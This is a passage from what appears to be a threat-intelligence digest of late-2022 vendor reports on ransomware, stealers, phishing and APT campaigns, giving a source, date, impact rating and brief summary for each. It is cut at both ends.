- 2022-12-05
- Impact:
- LOW
- Summary:
- Cybereason GSOC team analyzes a technique that utilizes Microsoft’s Windows Installation file (.msi) to compromise victims’ machines. MSI, formerly known as Microsoft Installer, is a Windows installer package format.
Source:
https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer
—
- Intel Source:
- Security Affairs
- Intel Name:
- Lazarus_APT_uses_fake_cryptocurrency_apps_to_spread_AppleJeus_Malware
- Date of Scan:
- 2022-12-05
- Impact:
- LOW
- Summary:
- The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware.
Source:
https://securityaffairs.co/wordpress/139290/apt/lazarus-apt-bloxholder-campaign.html
—
- Intel Source:
- Reversing Labs
- Intel Name:
- A_deep_dive_into_ZetaNile
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- ZetaNile is a set of open-source software trojans being used by Lazarus/ZINC. This set of trojanized, open-source software implants has been dubbed ZetaNile by Microsoft and BLINDINCAN by CISA. After some investigation, this campaign presented an opportunity for deep study by the ReversingLabs Research Team.
Source:
https://blog.reversinglabs.com/blog/zetanile-open-source-software-trojans-from-north-korea
—
- Intel Source:
- Mandiant
- Intel Name:
- The_cyber_espionage_activity_with_USB_devices
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- Mandiant’s Managed Defense team recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and assesses it is possibly linked to a China nexus.
Source:
https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia
—
- Intel Source:
- Securelist
- Intel Name:
- New_CryWiper_Trojan
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- Russian researchers from Securelist caught some attempts by a previously unknown Trojan, which was named CryWiper, to attack an organization’s network in the Russian Federation. After studying a sample of the malware, they found that this Trojan, although it disguises itself as ransomware and extorts money from the victim for “decrypting” data, in fact does not encrypt but purposefully destroys data in the affected system. Moreover, analysis of the Trojan’s program code showed that this was not the developer’s mistake but their original intention.
Source:
https://securelist.ru/novyj-troyanec-crywiper/106114/
—
- Intel Source:
- Weixin
- Intel Name:
- Mizuho_Bank_of_Japan_as_bait_for_Lazarus_attack
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- Recently, during daily threat hunting, the Red Raindrop team of QiAnXin Threat Intelligence Center found the latest Lazarus attack sample with zero antivirus detections. Mizuho Bank-related information is used as bait for the attack.
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_and_Scams_to_Be_Aware_of_this_Season
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- The Trustwave team has warned to be on the lookout this holiday shopping season for phishing and scams specifically designed to blend in with holiday online shopping activities. Trustwave SpiderLabs has compiled a list of the most prevalent shopping-related scams expected this year. These samples were recently observed from Trustwave’s spam traps and other Trustwave monitoring systems.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_analyses_of_Erbium_Stealer_Malware
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- The CYFIRMA research team observed and analyzed the Erbium Stealer malware sample. The team has also observed the stealer malware being advertised on Russian-speaking hacker forums. The malware sample is a 32-bit executable binary. It contains obfuscated contents to evade detection by security products and firewalls.
Source:
https://www.cyfirma.com/outofband/erbium-stealer-malware-report/
—
- Intel Source:
- CISA
- Intel Name:
- A_released_joint_Cybersecurity_Advisory_for_Cuba_Ransomware
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- The FBI and CISA released a joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware.
Source:
https://www.cisa.gov/uscert/ncas/current-activity/2022/12/01/stopransomware-cuba-ransomware
—
- Intel Source:
- Elastic
- Intel Name:
- The_delivery_of_YIPPHB_dropper
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- Elastic Security Labs identified 12 clusters of activity using a similar TTP of threading Base64 encoded strings with Unicode icons to load the YIPPHB dropper. YIPPHB is an unsophisticated, but effective, dropper used to deliver RAT implants going back at least May of 2022.
Source:
https://www.elastic.co/es/security-labs/doing-time-with-the-yipphb-dropper
—
- Intel Source:
- Cyble
- Intel Name:
- New_Malware_Strain_DuckLogs
- Date of Scan:
- 2022-12-01
- Impact:
- LOW
- Summary:
- Recently, Cyble researchers observed a new malware strain named DuckLogs, which performs multiple malicious activities such as stealer, keylogger, clipper, and remote access functions. DuckLogs is MaaS (Malware-as-a-Service). It steals users’ sensitive information, such as passwords, cookies, login data, histories, and crypto wallet details, and exfiltrates the stolen data from the victim’s machine to its C&C server.
Source:
https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/
—
- Intel Source:
- Cyble
- Intel Name:
- The_distribution_of_Redline_Stealer
- Date of Scan:
- 2022-12-01
- Impact:
- LOW
- Summary:
- Recently, Cyble researchers identified six phishing sites impersonating Express VPN that were distributing Windows malware. The threat actors tried to use phishing emails, online ads, SEO attacks, and various other means to propagate links over the internet.
Source:
https://blog.cyble.com/2022/11/30/redline-stealer-being-distributed-via-fake-express-vpn-sites/
—
- Intel Source:
- Cyber Florida
- Intel Name:
- Arechclient2_remote_access_trojan
- Date of Scan:
- 2022-12-01
- Impact:
- LOW
- Summary:
- Cyber Florida has observed network payload data obfuscated via Base64 encoding and sent to what appears to be a command-and-control server. The command-and-control server appears to be utilizing Google cloud services.
—
- Intel Source:
- Sophos
- Intel Name:
- Improved_LockBit_3_0_Black_attacks_with_more_capabilities
- Date of Scan:
- 2022-11-30
- Impact:
- MEDIUM
- Summary:
- A Sophos team did some analysis of multiple incidents where attackers used the latest version of LockBit ransomware (known variously as LockBit 3.0 or ‘LockBit Black’) and they discovered the latest tooling used by threat actors. The threat actors have begun experimenting with the use of scripting that would allow the malware to “self-spread” using Windows Group Policy Objects (GPO) or the tool PSExec, potentially making it easier for the malware to laterally move and infect computers without the need for affiliates to know how to take advantage of these features for themselves.
—
- Intel Source:
- Cyble
- Intel Name:
- The_ransomware_impact_on_Aviation_Industry
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- This month the ‘Daixin Team’ ransomware group claimed to infiltrate the networks of a Malaysia-based airline. The group allegedly stole 5 million passengers’ data, and airline employees’ personal and corporate information. ‘Daixin Team’ ransomware group came into existence in June 2022 and has claimed responsibility for targeting 5 organizations so far. In the US, the group has primarily affected Healthcare organizations.
Source:
https://blog.cyble.com/2022/11/23/aviation-industry-facing-ransomware-headwinds/
—
- Intel Source:
- ASEC
- Intel Name:
- Domains_Used_for_Magniber_Distribution_in_Korea
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- The ASEC analysis team introduced through a blog post the Magniber ransomware which attempted MOTW (Mark of the Web) bypassing. Afterward, using the data left in Zone.Identifier, we conducted an investigation on the sources used for the distribution of Magniber.
—
- Intel Source:
- Nozomi Networks
- Intel Name:
- IoT_Botnets_Evade_Detection_and_Analysis_Part_2
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- Nozomi researchers analyzed the malware samples and discovered new modification techniques that malware authors are using to evade detection. They are also adopting new methods for crafting malicious files, exploiting a variety of vulnerabilities in IoT devices, and using command-and-control (C&C) servers to maintain control of compromised devices.
Source:
https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis-part-2/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- A_technical_analysis_of_the_Dolphin_backdoor
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- ESET researchers have analyzed a previously unreported backdoor used by the ScarCruft APT group. The backdoor, which was named Dolphin, has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.
Source:
https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Website_Disguised_as_a_Famous_Korean_Email_Login_Website_Being_Distributed
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- The ASEC analysis team has identified the distribution of a malicious website in Korea that aims to steal account credentials from a famous Korean email service website.
—
- Intel Source:
- CYJAX
- Intel Name:
- China_Based_Fangxiao_Group_Running_Long_Phishing_Campaign
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from CYJAX have observed that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including retail, banking, travel, and energy. Attackers imitated over 400 organisations, including Emirates, Singapore’s Shopee, Unilever, Indonesia’s Indomie, Coca-Cola, McDonald’s, and Knorr.
Source:
https://www.cyjax.com/2022/11/14/fangxiao-a-chinese-threat-actor/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Massive_malvertising_campaign_capitalize_on_Black_Friday
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Malwarebytes have identified an ongoing malvertising campaign that has been ramping up fraudulent Google ads for the popular Walmart brand. Perhaps due to the upcoming Black Friday shopping deals, we are seeing a dramatic increase in traffic towards a number of malicious sites registered for the purpose of serving tech support scams.
—
- Intel Source:
- DFIR Report
- Intel Name:
- LNK_File_Leads_to_Domain_Wide_Ransomware
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from The DFIR Report have identified a threat actor gaining access to an environment via Emotet and operating over an eight-day period. During this time, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike. Remote access tools such as Tactical RMM and AnyDesk were used for command and control.
Source:
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Variant_Of_Ransomware_Targeting_Chile
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have identified a new variant of Punisher ransomware that was spreading through a COVID-19 theme-based phishing website. This Ransomware strain uses a common ransom note which is downloaded from the remote server, and then appends content to the ransom note to make it specific to each of its victims. The figure below shows the HTML file used as a ransom note.
Source:
https://blog.cyble.com/2022/11/25/punisher-ransomware-spreading-through-fake-covid-site/
—
- Intel Source:
- ASEC
- Intel Name:
- Word_Document_Attack_Distributed_in_Disguise_of_a_News_Survey
- Date of Scan:
- 2022-11-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team discovered that the Word document type identified in the blog ‘Malicious Word Files Targeting Specific Individuals Related to North Korea’ has recently been using FTP to leak user credentials. The filename of the identified Word document is ‘CNA[Q].doc’, disguised as a CNA Singaporean TV program interview.
—
- Intel Source:
- ASEC
- Intel Name:
- Word_Document_Attack_Distributed_as_Normal_MS_Office_URLs
- Date of Scan:
- 2022-11-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered during our additional monitoring process that the URL used in the fake Word document is becoming very cleverly disguised to closely resemble the normal URL, and we wish to advise caution on the part of users.
—
- Intel Source:
- ESET Research
- Intel Name:
- The_New_Wave_of_RansomBoggs_Ransomware
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from ESET have identified new ransomware attacks targeting organizations in Ukraine that have been linked to the notorious Russian military threat group Sandworm.
Source:
https://twitter.com/ESETresearch/status/1596181925663760386
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_Ransomware_Being_distributed_With_Similar_Filenames
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from ASEC have observed that LockBit 2.0 and LockBit 3.0 are being distributed again with only a change to their filenames.
—
- Intel Source:
- Sucuri
- Intel Name:
- New_Wave_of_SocGholish_Malware
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have observed a new type of WordPress infection in which threat actors used a distinctive feature to inject SocGholish malware.
Source:
https://blog.sucuri.net/2022/11/new-wave-of-socgholish-cid27x-injections.html
—
- Intel Source:
- Cloudsek
- Intel Name:
- Diving_Deep_into_Eternity_Stealer
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from CloudSEK have deeply analyzed the workings of Eternity stealer and provided a basic explanation of its techniques and methods.
—
- Intel Source:
- ASEC
- Intel Name:
- Wiki_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-25
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Wiki ransomware, which has been determined to be a variant of Crysis ransomware, is being distributed disguised as a normal program.
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Targeting_Online_Shoppers_on_Black_Friday
- Date of Scan:
- 2022-11-25
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGate have observed two Black Friday-oriented cyber-attacks that are gaining traction, one using an old PDF file and another exploiting typosquatting.
—
- Intel Source:
- ASEC
- Intel Name:
- Koxic_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-25
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that Koxic ransomware is being distributed in Korea. Recently, they detected a file with a modified appearance and a modified internal ransom note.
—
- Intel Source:
- Cofense
- Intel Name:
- Phishing_Attack_Targeting_Microsoft_Users
- Date of Scan:
- 2022-11-24
- Impact:
- LOW
- Summary:
- Researchers from Cofense have analyzed a phishing campaign that aims to steal an employee’s Microsoft credentials via a malicious HTML attachment. The attached file includes spliced code that, when executed, scrapes for the employee’s credentials.
Source:
https://cofense.com/blog/phishing-attack-targets-microsoft-users-via-html-attachment
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_Cryptonite_Ransomware
- Date of Scan:
- 2022-11-24
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have analyzed the Cryptonite ransomware kit that exists as free and open-source software.
—
- Intel Source:
- TrendMicro
- Intel Name:
- WannaRen_Ransomware_Targeting_Indian_Organization
- Date of Scan:
- 2022-11-24
- Impact:
- LOW
- Summary:
- Trend Micro researchers have observed a new variant of WannaRen ransomware named Life ransomware. This new variant uses a batch file to download and execute WINWORD.exe to perform DLL side-loading and load the ransomware in memory.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Fake_Shopping_Websites_Running_For_Black_Friday_Sales
- Date of Scan:
- 2022-11-23
- Impact:
- MEDIUM
- Summary:
- Check Point researchers have found a sharp increase in fake shopping-related websites in the run-up to Black Friday sales. They also warn shoppers to stay alert this Black Friday as hackers launch their own holiday specials.
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_Exploiting_Unused_Boa_Web_Servers
- Date of Scan:
- 2022-11-23
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed that the intrusion activity aimed at Indian power grid entities earlier this year probably exploited security flaws in the now-discontinued web server Boa.
—
- Intel Source:
- Zscaler
- Intel Name:
- Fake_FIFA_World_Cup_Streaming_Sites_Targeting_Virtual_Fans
- Date of Scan:
- 2022-11-23
- Impact:
- HIGH
- Summary:
- Researchers from Zscaler have identified that the FIFA World Cup 2022 has brought with it a spike in cyber attacks targeting football fans through fake streaming sites and lottery scams, which leverage the rush and excitement around these uncommon events to infect users with malware.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- New_Variant_of_RansomExx_Ransomware
- Date of Scan:
- 2022-11-23
- Impact:
- LOW
- Summary:
- IBM Security Intelligence researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language. Malware written in Rust often benefits from lower AV detection rates, and this may have been the primary reason for the use of the language.
Source:
https://securityintelligence.com/posts/ransomexx-upgrades-rust/
—
- Intel Source:
- Cybereason
- Intel Name:
- Black_Basta_Ransomware_Usin_Qakbot_Malware_to_Target_US_Companies
- Date of Scan:
- 2022-11-23
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have identified that the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization’s network.
—
- Intel Source:
- Avast
- Intel Name:
- Hackers_Leveraging_Chrome_Extension_to_Steal_Cryptocurrency_and_Passwords
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Avast have identified an information-stealing Google Chrome browser extension named ‘VenomSoftX’ which is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web.
Source:
https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IoCs_of_Donot_APT_group
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz identified various attack campaigns from the Donot APT group targeting Pakistan and other Asian countries. The most recent campaign leverages RTF documents spread through phishing.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-donot-apt-group-active-iocs-44
—
- Intel Source:
- Sekoia
- Intel Name:
- Rapidly_Increasing_Aurora_InfoStealer_Malware
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have identified that cybergangs are increasingly turning to a new Go-based information stealer named ‘Aurora’ to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads.
Source:
https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/
—
- Intel Source:
- PaloAlto
- Intel Name:
- DoubleZero_Wiper
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have introduced a machine learning model that predicts the maliciousness of .NET samples based on specific structures in the file, illustrated by analyzing a .NET wiper named DoubleZero.
Source:
https://unit42.paloaltonetworks.com/doublezero-net-wiper/
—
- Intel Source:
- Netskope
- Intel Name:
- Hackers_Leveraging_Adobe_Acrobat_For_Phishing_Attack
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Netskope have discovered a phishing campaign that is abusing Adobe Acrobat to host a Microsoft Office phishing page.
Source:
https://www.netskope.com/blog/cloud-abuse-new-technique-using-adobe-acrobat-to-host-phishing
—
- Intel Source:
- Securonix
- Intel Name:
- QakBot_Malware_New_Initial_Execution
- Date of Scan:
- 2022-11-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Securonix shared their observations of a recent version of the QakBot, aka Qbot, malware in which calls to the Windows binary Regsvr32 are obfuscated in creative ways.
Source:
https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution/
—
- Intel Source:
- Zscaler
- Intel Name:
- Hackers_Are_Active_Again_For_Festival_Season
- Date of Scan:
- 2022-11-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscaler have observed four emerging skimming attacks targeting e-commerce stores. These skimming campaigns have a long shelf life and manage to keep their malicious activities under the radar for several months.
—
- Intel Source:
- Cyble
- Intel Name:
- The_browser_hijacking_by_multiple_Chrome_extensions
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered multiple Chrome extensions that compromised over two million users with browser hijackers. All the extensions that they found were present on the Chrome Web Store. After installation, it was observed that the browser hijackers were also changing the browser’s default search engine without the users’ knowledge.
Source:
https://blog.cyble.com/2022/11/22/over-2-million-users-affected-with-browser-hijackers/
—
- Intel Source:
- Talos
- Intel Name:
- New_Improved_Versions_of_LodaRAT
- Date of Scan:
- 2022-11-21
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified several variants and altered versions of LodaRAT with updated functionality, including new functionality allowing proliferation to attached removable storage, a new string encoding algorithm, and the removal of “dead” functions.
Source:
https://blog.talosintelligence.com/get-a-loda-this/?&web_view=true
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Fake_Antivirus_Phishing_Campaign
- Date of Scan:
- 2022-11-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a phishing email that looks like a McAfee antivirus subscription notice.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Wave_of_Ransomware_Campaigns
- Date of Scan:
- 2022-11-21
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. They are not only encrypting victims’ files and demanding a ransom payment but also stealing the Discord accounts of infected users.
—
- Intel Source:
- Trellix
- Intel Name:
- Hackers_Leveraging_FIFA_World_Cup_For_Phishing_Attack
- Date of Scan:
- 2022-11-21
- Impact:
- HIGH
- Summary:
- Researchers from Trellix have observed attackers leveraging FIFA and football-based campaigns to target organizations in Arab countries.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Preta_Hackers_Targeting_Governments_Worldwide
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Trend Micro have observed that the threat group Earth Preta targets governments worldwide via spear-phishing attacks. The group abused fake Google accounts to distribute the malware via spear-phishing emails, with the malware initially stored in an archive file (such as rar/zip/jar) and distributed through Google Drive links.
Source:
https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
—
- Intel Source:
- Akamai
- Intel Name:
- Phishing_Attack_Leveraging_Famous_Brands_to_Targeting_US_shoppers
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Akamai researchers have identified a sophisticated phishing kit that has been targeting North Americans since mid-September, using lures focused on holidays like Labor Day and Halloween.
Source:
https://www.akamai.com/blog/security-research/sophisticated-phishing-scam-abusing-holiday-sentiment
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_Analysis_of_2022_FIFA_World_Cup_Threat
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future have analyzed the threat landscape ahead of the 2022 FIFA World Cup hosted in Qatar that begins on November 20, 2022.
—
- Intel Source:
- Checkmarx Security
- Intel Name:
- W4SP_Stealer_Targeting_Python_Developers
- Date of Scan:
- 2022-11-18
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx Security have identified an ongoing supply chain attack that is leveraging malicious Python packages to distribute malware called W4SP Stealer, with over hundreds of victims ensnared to date.
—
- Intel Source:
- CISA
- Intel Name:
- Hive_ransomware_extorted_100M_from_over_1300_victims
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Researchers from the FBI have identified that the notorious Hive ransomware gang has successfully extorted roughly $100 million from over a thousand companies since June 2021. The FBI also says that the Hive gang will deploy additional ransomware payloads on the networks of victims who refuse to pay the ransom.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Diving_Deep_into_Venus_Ransomware
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have analyzed the Venus ransomware and provided further analysis, indicators of compromise, and TTPs.
—
- Intel Source:
- CADO Security
- Intel Name:
- WatchDog_Continues_to_Targeting_East_Asian_CSPs
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- Researchers from Cado Labs have discovered the re-emergence of the threat actor WatchDog. This is an opportunistic and prominent threat actor, who is known for routinely carrying out cryptojacking attacks against resources hosted by various Cloud Service Providers.
Source:
https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/
—
- Intel Source:
- Cofense
- Intel Name:
- Phishing_Campaign_Abusing_MS_Customer_Voice_URLs
- Date of Scan:
- 2022-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Cofense have observed phishing campaigns abusing Microsoft Customer Voice URLs. Microsoft Customer Voice is a customer engagement/survey service that is used for plenty of benign and useful reasons.
Source:
https://cofense.com/blog/microsoft-customer-voice-urls-used-in-latest-phishing-campaign
—
- Intel Source:
- Krebs on Security
- Intel Name:
- The_Disneyland_Malware_Team_activity
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- A cybercrime group calling itself the Disneyland Team has been operating dozens of phishing domains that spoof popular bank brands since March 2022. The Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non-Latin alphabets like Cyrillic.
—
- Intel Source:
- Blackberry
- Intel Name:
- ARCrypter_Ransomware_Spreading_From_Latin_America_to_the_World
- Date of Scan:
- 2022-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers from BlackBerry have identified additional samples of interest for ARCrypter ransomware, which has expanded its operations from Latin America to the world. Based on the unique strings identified during the analysis, they have named this previously unknown ransomware variant “ARCrypter”.
—
- Intel Source:
- Fortinet
- Intel Name:
- Debugging_DotNET_Malware
- Date of Scan:
- 2022-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have described how we can create a custom .NET program to help debug a DLL loaded and invoked directly in memory.
—
- Intel Source:
- Trellix
- Intel Name:
- An_Examination_of_Wiper_Families
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- Researchers from Trellix have analyzed more than twenty recent wiper families, their trends, techniques, and their overlap with other wipers.
—
- Intel Source:
- McAfee
- Intel Name:
- Advantage_of_FTX_Bankruptcy_by_threat_actors
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- McAfee has discovered several phishing sites targeting FTX users. One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it.
—
- Intel Source:
- Vmware
- Intel Name:
- Diving_Deep_into_Downloader_Malware
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from VMware have analyzed the evasive downloader malware campaigns, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.
Source:
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html
—
- Intel Source:
- CISA
- Intel Name:
- Iranian_hackers_breached_federal_agency_using_Log4Shell_exploit
- Date of Scan:
- 2022-11-16
- Impact:
- HIGH
- Summary:
- The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.
—
- Intel Source:
- Securelist
- Intel Name:
- North_Korean_hackers_target_European_organization
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified that North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America.
Source:
https://securelist.com/dtrack-targeting-europe-latin-america/107798/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_HTTP_CONNECT_malicious_requests
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed HTTP CONNECT requests to a honeypot and assess that they may have been an attempt to relay traffic through the honeypot and hide the original source of the request. It is also possible that the traffic was funneled through multiple proxy endpoints to make identification of the source difficult. Allowing HTTP CONNECT on internet-facing resources can potentially expose internal network resources or assist in the forwarding of malicious traffic.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Heodo_Malware
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Heodo Malware. It is a malicious program that is a variant of Emotet.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-an-emerging-heodo-malware-active-iocs
—
- Intel Source:
- Proofpoint
- Intel Name:
- Emotet_Delivering_via_Malicious_Email
- Date of Scan:
- 2022-11-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint have observed multiple changes to Emotet and its payloads including the lures used, and changes to the Emotet modules, loader, and packer.
Source:
https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return
—
- Intel Source:
- PaloAlto
- Intel Name:
- Typhon_Stealer_Back_With_New_Capabilities
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have identified that Typhon Stealer provides threat actors with an easy-to-use, configurable builder for hire. They are continuing to update their code to enhance their tools and techniques to evade security systems and exfiltrate data smoothly.
Source:
https://unit42.paloaltonetworks.com/typhon-reborn-stealer/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_RapperBot_Campaign
- Date of Scan:
- 2022-11-16
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers observed new samples with the same distinctive C2 protocol used by RapperBot. In August 2022, there was a significant drop in the number of samples collected in the wild. It quickly became evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers. Given the several similarities between the previous and present campaigns, it is believed that either the same threat actor is behind both or each campaign branched from the same privately shared source code.
Source:
https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks
—
- Intel Source:
- ASEC
- Intel Name:
- Dagon_Locker_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the DAGON LOCKER ransomware is being distributed in Korea. It is commonly distributed through phishing emails or as an email attachment, but because it is ransomware-as-a-service, the distribution route and target can vary according to the threat actor.
—
- Intel Source:
- Intezer
- Intel Name:
- Hackers_Abusing_LNK_Files
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Intezer researchers have described how threat actors use LNK files in the different stages of attacks.
Source:
https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_REvil_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of REvil ransomware. It (also known as Sodinokibi) is a Ransomware-as-a-Service (RaaS).
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-revil-ransomware-active-iocs-20
—
- Intel Source:
- DFIR Report
- Intel Name:
- Hackers_Leveraging_BumbleBee_to_Load_Meterpreter_and_CobaltStrike
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from The DFIR Report have identified that threat actors leveraged BumbleBee to load a Meterpreter agent and Cobalt Strike Beacons.
Source:
https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_Hackers_Targeting_Government_Agencies
- Date of Scan:
- 2022-11-15
- Impact:
